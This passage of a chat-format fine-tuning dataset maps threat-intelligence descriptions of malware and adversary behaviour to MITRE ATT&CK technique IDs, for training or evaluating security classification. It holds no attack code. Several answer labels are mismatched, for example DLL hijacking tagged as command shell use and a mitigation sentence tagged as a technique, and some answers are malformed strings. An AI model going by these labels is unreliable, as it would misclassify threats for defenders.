Technique\". " }, { "role": "user", "content": "OLDBAIT can use SMTP for C2." }, { "role": "assistant", "content": "T1071.003 - Mail Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Threat Group-3390 has downloaded additional malware and tools, including through the use of `certutil`, onto a compromised host ." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN6 has deployed a utility script named \"kill.bat\" to disable anti-virus." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Donut can generate shellcode outputs that execute via VBScript." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TA453, an Iranian-state aligned actor, masqueraded as British scholars to covertly target individuals of intelligence interest to the Iranian government in what Proofpoint has dubbed Operation SpoofedScholars. The email conversations were benign until TA453 provided a link to a compromised website hosting a credential harvesting page. The use of a legitimate but actor-compromised website is an increase in sophistication compared to TA453’s historical Tactics, Techniques, and Procedures of using actor-controlled credential phishing websites. Proofpoint has worked with the appropriate authorities to conduct victim notification" }, { "role": "assistant", "content": "T1584.001 - Domains" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ecipekac can abuse the legitimate application policytool.exe to load a malicious DLL." }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GravityRAT uses HTTP for C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Carberp has collected the operating system version from the infected system." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NETWIRE can retrieve passwords from messaging and mail client applications." }, { "role": "assistant", "content": "T1555 - Credentials from Password Stores" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "contains a collection of CodeExecution modules that enable by injecting code (DLL, shellcode) or reflectively loading a Windows PE file into a process." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly 2.0 has injected SMB URLs into malicious Word spearphishing attachments to initiate Forced Authentication." }, { "role": "assistant", "content": "T1221 - Template Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Penquin can report the file system type and disk space of a compromised host to C2." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "If the process is running with Low integrity, REvil terminates the current process and launches another instance of itself via ShellExecute using the \"runas\" command, which executes the new instance with administrative rights" }, { "role": "assistant", "content": "T1134.002 - Create Process with Token" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DarkWatchman has used the \"csc.exe\" tool to compile a C# executable." }, { "role": "assistant", "content": "T1027.004 - Obfuscated Files or Information: Compile After Delivery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Crutch has the ability to persist using scheduled tasks." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZxShell has a command to clear system event logs." }, { "role": "assistant", "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NanHaiShu encodes files in Base64." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses port 8080 for C2." }, { "role": "assistant", "content": "T1043 - Commonly Used Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware then grants itself debugging privileges by modifying its security token to add SeDebugPrivilege. This step is a prerequisite for the remainder of SUNSPOT’s execution, which involves reading other processes’ memory" }, { "role": "assistant", "content": "T1134 - Access Token Manipulation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BitPaymer has attempted to install itself as a service to maintain persistence." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN8 has injected malicious code into a new svchost.exe process." }, { "role": "assistant", "content": "T1055.004 - Process Injection: Asynchronous Procedure Call" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used TeamViewer to preserve remote access in case control using the Cobalt Strike module was lost." }, { "role": "assistant", "content": "T1108 - Redundant Access" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PlugX executes DLL hijacking with benign applications such as ESET antivirus, Adobe Update etc. Also, the PlugX that Mustang Panda APT uses has some extra features, including spreading through USB, gathering information, and stealing documents in air-gaped networks via USB" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses the tasklist to view running processes on the victim’s machine." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware then requests a connection to 192.184.60.229 on TCP port 81 using the command \"05 01 00 01 c0 b8 3c e5 00 51\" and verifies that the first two bytes from the server are \"05 00\" (c0 b8 3c e5 is the IP address and 00 51 is the port in network byte order)" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "makes their malware look like Flash Player, Office, or PDF documents in order to entice a user to click on it." }, { "role": "assistant", "content": "T1204 - User Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mosquito deletes files using DeleteFileW API call." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The samples install HTTPBrowser at %APPDATA%/wdm.exe. Persistence is established via the HKCUSoftwareMicrosoftWindowsCurrentVersionRun key value for wdm set to the path of the executable. Previous samples have set persistence via Run key values for 360v" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Leviathan has used PowerShell for execution." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 has used Google Drive for C2." }, { "role": "assistant", "content": "T1102.002 - Bidirectional Communication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The third campaign deployed a different custom RPC backdoor to that used in the second campaign. This backdoor used code derived from the publicly available PowerShellRunner tool to execute PowerShell scripts without using powershell.exe. Prior to execution, the PowerShell scripts were stored Base64-encoded in the registry" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CharmPower can decrypt downloaded modules prior to execution." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Windigo has used a script to detect which Linux distribution and version is currently installed on the system." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "iKitten prompts the user for their credentials." }, { "role": "assistant", "content": "T1056.002 - Input Capture: GUI Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Micropsia creates a RAR archive based on collected files on the victim's machine." }, { "role": "assistant", "content": "T1560.001 - Archive Collected Data: Archive via Utility" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lucifer can issue shell commands to download and execute additional payloads." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "jRAT’s Java payload is encrypted with AES. Additionally, backdoor files are encrypted using DES as a stream cipher. Later variants of jRAT also incorporated AV evasion methods such as Java bytecode obfuscation via the commercial Allatori obfuscation tool." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "IcedCoffee is a fairly basic backdoor which uses WMI to collect a variety of system and user information from the system, which is then encoded with base64, encrypted with RC4 and submitted via HTTP POST to the C2 server" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ember Bear has used Discord's content delivery network (CDN) to deliver malware and malicious scripts to a compromised host." }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SideTwist has the ability to upload files from a compromised host." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group has used tools to detect sandbox or VMware services through identifying the presence of a debugger or related services." }, { "role": "assistant", "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Threat Group-3390 has hosted malicious payloads on Dropbox." }, { "role": "assistant", "content": "T1608.001 - Upload Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Magic Hound has created a user named `DefaultAccount` on compromised machines and assigned it to the Administrators and Remote Desktop Users groups." }, { "role": "assistant", "content": "T1136.001 - Create Account: Local Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike can make tokens from known credentials." }, { "role": "assistant", "content": "T1134.003 - Make and Impersonate Token" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POSHSPY makes the most of using built-in Windows features – so-called “living off the land” – to make an especially stealthy backdoor. POSHSPY's use of WMI to both store and persist the backdoor code makes it nearly invisible to anyone not familiar with the intricacies of WMI. Its use of a PowerShell payload means that only legitimate system processes are utilized and that the malicious code execution can only be identified through enhanced logging or in memory. The backdoor's infrequent beaconing, traffic obfuscation, extensive encryption and use of geographically local, legitimate websites for command and control (C2) make identification of its network traffic difficult. Every aspect of POSHSPY is efficient and covert" }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ChChes communicates to its C2 server over HTTP and embeds data within the Cookie HTTP header." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ComRAT samples have been seen which hijack COM objects for persistence by replacing the path to shell32.dll in registry location \"HKCU\\Software\\Classes\\CLSID\\{42aedc87-2188-41fd-b9a3-0c966feabec1}\\InprocServer32\"." }, { "role": "assistant", "content": "T1546.015 - Event Triggered Execution: Component Object Model Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AppleSeed can collect data on a compromised host." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RTM has used an RSS feed on Livejournal to update a list of encrypted C2 server names. RTM has also hidden Pony C2 server IP addresses within transactions on the Bitcoin and Namecoin blockchain." }, { "role": "assistant", "content": "T1102.001 - Dead Drop Resolver" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cookie Notice . This website uses cookies to help personalize and improve your experience. By Continuing to use this site, you are consenting to the use of cookies. Further research into the IP address hosting the spoofed page revealed a broader campaign to steal credentials. Countries with targeted universities. Source: Secureworks) . After entering their credentials into the fake login page, victims were redirected to the legitimate website where they were automatically logged into a valid session or were prompted to enter their credentials again. Numerous spoofed domains referenced the targeted universities' online library systems, indicating the threat actors' intent to gain access to these resources. CTU™ researchers were unable to confirm functionality of all identified spoofed pages because some of the domains were not accessible at the time of analysis. Domain registrations indicate the infrastructure to support this campaign was still being created when CTU researchers discovered the activity. A domain registered in May 2018 also contained subdomains spoofing university targets. These subdomains redirected visitors to spoofed login pages on other attacker-controlled domains" }, { "role": "assistant", "content": "T1583.001 - Domains" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FBI has high confidence that HIDDEN COBRA actors are using the IP addresses for further network exploitation.This alert includes technical indicators related to specific North Korean government cyber operations and provides suggested response actions to those indicators, recommended mitigation techniques, and information on reporting incidents to the U.S" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The formula uses a command prompt to run a PowerShell script that attempts to download and execute a second PowerShell script hosted at the URL hxxp://micrrosoft[.]net/winupdate.ps1. By default, Excel will not launch the command prompt application, but will do so with the user’s consent via the following dialog box in Figure 3" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pillowmint has stored its malicious payload in the registry key \"HKLM\\SOFTWARE\\Microsoft\\DRM\"." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Clop has been packed to help avoid detection." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT41 has used rundll32.exe to execute a loader." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Leafminer has obtained and used tools such as LaZagne, Mimikatz, PsExec, and MailSniper." }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN5 has used legitimate VPN, RDP, Citrix, or VNC credentials to maintain access to a victim environment." }, { "role": "assistant", "content": "T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We believe that the source of all these stolen certificates could be the same Winnti group. Either this group has close contacts with other Chinese hacker gangs, or it sells the certificates on the black market in China" }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses a custom TCP protocol for C2." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Most PowerShell scripts involved in LockBit 2.0 cases are Base64 encoded." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Seasalt has a command to download additional files." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "compromised McAfee ePO to move laterally by distributing malware as a software deployment task." }, { "role": "assistant", "content": "T1072 - Software Deployment Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POSHSPY leverages two of the tools the group frequently uses: PowerShell and Windows Management Instrumentation (WMI)" }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "runs the net view command" }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Next, to the beginning of the BASE64 string a random BASE64 string with the length of 5 characters is added" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Avaddon ransomware executable is not packed. However, its strings appear Base64 encoded using a custom alphabet. The Avaddon ransomware uses the Windows crypto API to generate an AES key, with which it then (presumably) encrypts the data. The generated AES key is then exported and encrypted via a previously from the ransomware binary imported key" }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A variant downloads the backdoor payload via the BITS service." }, { "role": "assistant", "content": "T1197 - BITS Jobs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Some of BRONZE PRESIDENT's malware has persistence capabilities. For example, ORat uses a WMI event consumer to maintain its presence on a compromised host. The group also creates and maintains scheduled tasks to achieve this purpose. Figure 8 shows a Sysdriver scheduled task that periodically executes a Cobalt Strike payload" }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has been observed using SQL injection to gain access to systems." }, { "role": "assistant", "content": "T1190 - Exploit Public-Facing Application" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FrameworkPOS can collect elements related to credit card data from process memory." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses Web shells on publicly accessible Web servers to access victim networks." }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UNC2465 used phishing emails and legitimate services to deliver the SMOKEDHAM backdoor. SMOKEDHAM is a .NET backdoor that supports keylogging, taking screenshots, and executing arbitrary .NET commands. During one incident, the threat actor appeared to establish a line of communication with the victim before sending a malicious Google Drive link delivering an archive containing an LNK downloader. More recent UNC2465 emails have used Dropbox links with a ZIP archive containing malicious LNK files that, when executed, would ultimately lead to SMOKEDHAM being downloaded onto the system. UNC2465 has used Advanced IP Scanner, BLOODHOUND, and RDP for internal reconnaissance and lateral movement activities within victim environments. The threat actor has used Mimikatz for credential harvesting to escalate privileges in the victim network. Mandiant has observed the threat actor using PsExec and cron jobs to deploy the DARKSIDE ransomware. UNC2465 has called the customer support lines of victims and told them that data was stolen and instructed them to follow the link in the ransom note" }, { "role": "assistant", "content": "T1204.001 - Malicious Link', 'T1598.003 - Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TrickBot can implant malicious code into a compromised device's firmware." }, { "role": "assistant", "content": "T1542.003 - Bootkit" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sibot checked if the compromised system is configured to use proxies." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PlayList.vbs contains the obfuscated codes, which it executes after decrypting the obfuscations." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "collects the current username from the victim." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Turla has gathered credentials from the Windows Credential Manager tool." }, { "role": "assistant", "content": "T1555.004 - Credentials from Password Stores: Windows Credential Manager" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Tomiris has connected to a signalization server that provides a URL and port, and then Tomiris sends a GET request to that URL to establish C2." }, { "role": "assistant", "content": "T1568 - Dynamic Resolution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gazer injects its communication module into an Internet accessible process through which it performs C2." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can execute commands using a shell." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The image displayed to the user after mounting the DMG appears to be the “Install” file. In actuality, it is just a system link that points to the 1302.app application bundle, or the malicious application itself. By double-clicking the “Install” image in Figure C, the system actually executes the 1302.app, where 1302.app/Contents/MacOS/1302 is just a bash script" }, { "role": "assistant", "content": "T1553.001 - Subvert Trust Controls: Gatekeeper Bypass" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This can be complemented by restricting direct internet access to the company’s internal networks while using proxies to access external resources" }, { "role": "assistant", "content": "T1090 - Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Along the way, HermeticWiper’s more mundane operations provide us with further IOCs to monitor for. It also modifies several registry keys, including setting the SYSTEM\\CurrentControlSet\\Control\\CrashControl CrashDumpEnabled key to 0, effectively disabling crash dumps before the abused driver’s execution starts" }, { "role": "assistant", "content": "T1562.006 - Impair Defenses: Indicator Blocking', 'T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of 